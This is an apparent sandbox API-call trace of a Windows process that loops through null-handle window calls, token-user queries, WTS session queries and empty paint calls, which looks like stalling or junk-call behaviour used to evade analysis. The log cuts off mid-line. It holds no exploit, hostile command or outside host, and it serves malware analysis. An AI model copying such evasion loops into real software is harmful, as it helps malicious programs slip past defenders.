[0221.027] GetTickCount () returned 0xe30d [0221.028] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.028] SetForegroundWindow (hWnd=0x0) returned 0 [0221.028] BringWindowToTop (hWnd=0x0) returned 0 [0221.028] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x370) returned 1 [0221.028] GetTokenInformation (in: TokenHandle=0x370, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.028] GetLastError () returned 0x7a [0221.028] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.028] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.029] WTSFreeMemory (pMemory=0x0) [0221.029] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.029] TextOutW (hdc=0x0, x=824, y=1824, lpString="", c=0) returned 1 [0221.029] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.029] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.029] GetTickCount () returned 0xe30d [0221.031] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.032] SetForegroundWindow (hWnd=0x0) returned 0 [0221.032] BringWindowToTop (hWnd=0x0) returned 0 [0221.032] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x374) returned 1 [0221.032] GetTokenInformation (in: TokenHandle=0x374, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.032] GetLastError () returned 0x7a [0221.032] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.032] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.032] WTSFreeMemory (pMemory=0x0) [0221.033] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.033] TextOutW (hdc=0x0, x=834, y=1849, lpString="", c=0) returned 1 [0221.033] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.033] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.033] GetTickCount () returned 0xe30d [0221.034] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.034] SetForegroundWindow (hWnd=0x0) returned 0 [0221.034] BringWindowToTop (hWnd=0x0) returned 0 [0221.034] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x378) returned 1 [0221.034] GetTokenInformation (in: TokenHandle=0x378, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.034] GetLastError () returned 0x7a [0221.034] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.034] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.035] WTSFreeMemory (pMemory=0x0) [0221.035] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.035] TextOutW (hdc=0x0, x=844, y=1874, lpString="", c=0) returned 1 [0221.035] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.035] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.035] GetTickCount () returned 0xe30d [0221.043] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.043] SetForegroundWindow (hWnd=0x0) returned 0 [0221.043] BringWindowToTop (hWnd=0x0) returned 0 [0221.043] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x37c) returned 1 [0221.043] GetTokenInformation (in: TokenHandle=0x37c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.043] GetLastError () returned 0x7a [0221.043] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.043] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.044] WTSFreeMemory (pMemory=0x0) [0221.044] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.044] TextOutW (hdc=0x0, x=854, y=1899, lpString="", c=0) returned 1 [0221.044] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.044] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.044] GetTickCount () returned 0xe31c [0221.045] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.045] SetForegroundWindow (hWnd=0x0) returned 0 [0221.045] BringWindowToTop (hWnd=0x0) returned 0 [0221.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x380) returned 1 [0221.045] GetTokenInformation (in: TokenHandle=0x380, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.045] GetLastError () returned 0x7a [0221.046] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.046] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.046] WTSFreeMemory (pMemory=0x0) [0221.046] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.046] TextOutW (hdc=0x0, x=864, y=1924, lpString="", c=0) returned 1 [0221.046] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.046] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.046] GetTickCount () returned 0xe31c [0221.047] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.048] SetForegroundWindow (hWnd=0x0) returned 0 [0221.048] BringWindowToTop (hWnd=0x0) returned 0 [0221.048] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x384) returned 1 [0221.048] GetTokenInformation (in: TokenHandle=0x384, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.048] GetLastError () returned 0x7a [0221.048] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.048] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.048] WTSFreeMemory (pMemory=0x0) [0221.048] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.048] TextOutW (hdc=0x0, x=874, y=1949, lpString="", c=0) returned 1 [0221.048] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.049] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.049] GetTickCount () returned 0xe31c [0221.051] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.051] SetForegroundWindow (hWnd=0x0) returned 0 [0221.051] BringWindowToTop (hWnd=0x0) returned 0 [0221.051] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x388) returned 1 [0221.051] GetTokenInformation (in: TokenHandle=0x388, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.051] GetLastError () returned 0x7a [0221.051] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.051] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.056] WTSFreeMemory (pMemory=0x0) [0221.056] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.056] TextOutW (hdc=0x0, x=884, y=1974, lpString="", c=0) returned 1 [0221.056] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.056] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.056] GetTickCount () returned 0xe32c [0221.057] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.057] SetForegroundWindow (hWnd=0x0) returned 0 [0221.057] BringWindowToTop (hWnd=0x0) returned 0 [0221.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x38c) returned 1 [0221.057] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.057] GetLastError () returned 0x7a [0221.057] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.057] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.058] WTSFreeMemory (pMemory=0x0) [0221.058] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.058] TextOutW (hdc=0x0, x=894, y=1999, lpString="", c=0) returned 1 [0221.058] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.058] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.058] GetTickCount () returned 0xe32c [0221.058] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.058] SetForegroundWindow (hWnd=0x0) returned 0 [0221.058] BringWindowToTop (hWnd=0x0) returned 0 [0221.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x390) returned 1 [0221.058] GetTokenInformation (in: TokenHandle=0x390, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.058] GetLastError () returned 0x7a [0221.059] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.059] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.059] WTSFreeMemory (pMemory=0x0) [0221.059] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.059] TextOutW (hdc=0x0, x=904, y=2024, lpString="", c=0) returned 1 [0221.059] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.059] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.059] GetTickCount () returned 0xe32c [0221.060] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.060] SetForegroundWindow (hWnd=0x0) returned 0 [0221.060] BringWindowToTop (hWnd=0x0) returned 0 [0221.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x394) returned 1 [0221.060] GetTokenInformation (in: TokenHandle=0x394, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.060] GetLastError () returned 0x7a [0221.060] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.060] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.061] WTSFreeMemory (pMemory=0x0) [0221.061] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.061] TextOutW (hdc=0x0, x=914, y=2049, lpString="", c=0) returned 1 [0221.061] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.061] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.061] GetTickCount () returned 0xe32c [0221.061] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.061] SetForegroundWindow (hWnd=0x0) returned 0 [0221.062] BringWindowToTop (hWnd=0x0) returned 0 [0221.062] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x398) returned 1 [0221.062] GetTokenInformation (in: TokenHandle=0x398, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.062] GetLastError () returned 0x7a [0221.062] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.062] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.062] WTSFreeMemory (pMemory=0x0) [0221.062] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.062] TextOutW (hdc=0x0, x=924, y=2074, lpString="", c=0) returned 1 [0221.062] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.063] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.063] GetTickCount () returned 0xe32c [0221.063] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.063] SetForegroundWindow (hWnd=0x0) returned 0 [0221.063] BringWindowToTop (hWnd=0x0) returned 0 [0221.063] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x39c) returned 1 [0221.063] GetTokenInformation (in: TokenHandle=0x39c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.063] GetLastError () returned 0x7a [0221.063] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.064] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.064] WTSFreeMemory (pMemory=0x0) [0221.064] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.064] TextOutW (hdc=0x0, x=934, y=2099, lpString="", c=0) returned 1 [0221.064] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.064] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.064] GetTickCount () returned 0xe32c [0221.065] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.065] SetForegroundWindow (hWnd=0x0) returned 0 [0221.065] BringWindowToTop (hWnd=0x0) returned 0 [0221.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3a0) returned 1 [0221.065] GetTokenInformation (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.065] GetLastError () returned 0x7a [0221.065] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.065] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.066] WTSFreeMemory (pMemory=0x0) [0221.066] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.066] TextOutW (hdc=0x0, x=944, y=2124, lpString="", c=0) returned 1 [0221.066] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.066] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.066] GetTickCount () returned 0xe32c [0221.067] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.067] SetForegroundWindow (hWnd=0x0) returned 0 [0221.067] BringWindowToTop (hWnd=0x0) returned 0 [0221.067] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3a4) returned 1 [0221.067] GetTokenInformation (in: TokenHandle=0x3a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.067] GetLastError () returned 0x7a [0221.067] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.067] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.071] WTSFreeMemory (pMemory=0x0) [0221.071] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.072] TextOutW (hdc=0x0, x=954, y=2149, lpString="", c=0) returned 1 [0221.072] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.072] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.072] GetTickCount () returned 0xe33b [0221.084] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.084] SetForegroundWindow (hWnd=0x0) returned 0 [0221.085] BringWindowToTop (hWnd=0x0) returned 0 [0221.085] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3a8) returned 1 [0221.085] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.085] GetLastError () returned 0x7a [0221.085] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.085] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.085] WTSFreeMemory (pMemory=0x0) [0221.085] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.086] TextOutW (hdc=0x0, x=964, y=2174, lpString="", c=0) returned 1 [0221.086] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.086] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.086] GetTickCount () returned 0xe34b [0221.086] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.086] SetForegroundWindow (hWnd=0x0) returned 0 [0221.086] BringWindowToTop (hWnd=0x0) returned 0 [0221.086] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3ac) returned 1 [0221.086] GetTokenInformation (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.086] GetLastError () returned 0x7a [0221.086] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.086] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.087] WTSFreeMemory (pMemory=0x0) [0221.087] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.087] TextOutW (hdc=0x0, x=974, y=2199, lpString="", c=0) returned 1 [0221.087] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.087] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.087] GetTickCount () returned 0xe34b [0221.091] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.091] SetForegroundWindow (hWnd=0x0) returned 0 [0221.091] BringWindowToTop (hWnd=0x0) returned 0 [0221.091] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3b0) returned 1 [0221.091] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.091] GetLastError () returned 0x7a [0221.091] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.091] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.092] WTSFreeMemory (pMemory=0x0) [0221.092] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.092] TextOutW (hdc=0x0, x=984, y=2224, lpString="", c=0) returned 1 [0221.092] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.092] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.092] GetTickCount () returned 0xe34b [0221.092] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.092] SetForegroundWindow (hWnd=0x0) returned 0 [0221.092] BringWindowToTop (hWnd=0x0) returned 0 [0221.093] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3b4) returned 1 [0221.093] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.093] GetLastError () returned 0x7a [0221.093] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.093] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.093] WTSFreeMemory (pMemory=0x0) [0221.093] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.093] TextOutW (hdc=0x0, x=994, y=2249, lpString="", c=0) returned 1 [0221.093] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.094] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.094] GetTickCount () returned 0xe34b [0221.094] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.094] SetForegroundWindow (hWnd=0x0) returned 0 [0221.094] BringWindowToTop (hWnd=0x0) returned 0 [0221.094] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3b8) returned 1 [0221.094] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.094] GetLastError () returned 0x7a [0221.094] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.094] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.095] WTSFreeMemory (pMemory=0x0) [0221.095] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.095] TextOutW (hdc=0x0, x=1004, y=2274, lpString="", c=0) returned 1 [0221.095] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.095] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.095] GetTickCount () returned 0xe34b [0221.096] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.096] SetForegroundWindow (hWnd=0x0) returned 0 [0221.096] BringWindowToTop (hWnd=0x0) returned 0 [0221.096] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x3bc) returned 1 [0221.096] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.096] GetLastError () returned 0x7a [0221.096] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.096] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.097] WTSFreeMemory (pMemory=0x0) [0221.097] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.097] TextOutW (hdc=0x0, x=1014, y=2299, lpString="", c=0) returned 1 [0221.097] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.097] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.097] GetTickCount () returned 0xe34b [0221.097] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.098] SetForegroundWindow (hWnd=0x0) returned 0 [0221.098] BringWindowToTop (hWnd=0x0) returned 0 [0221.098] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, 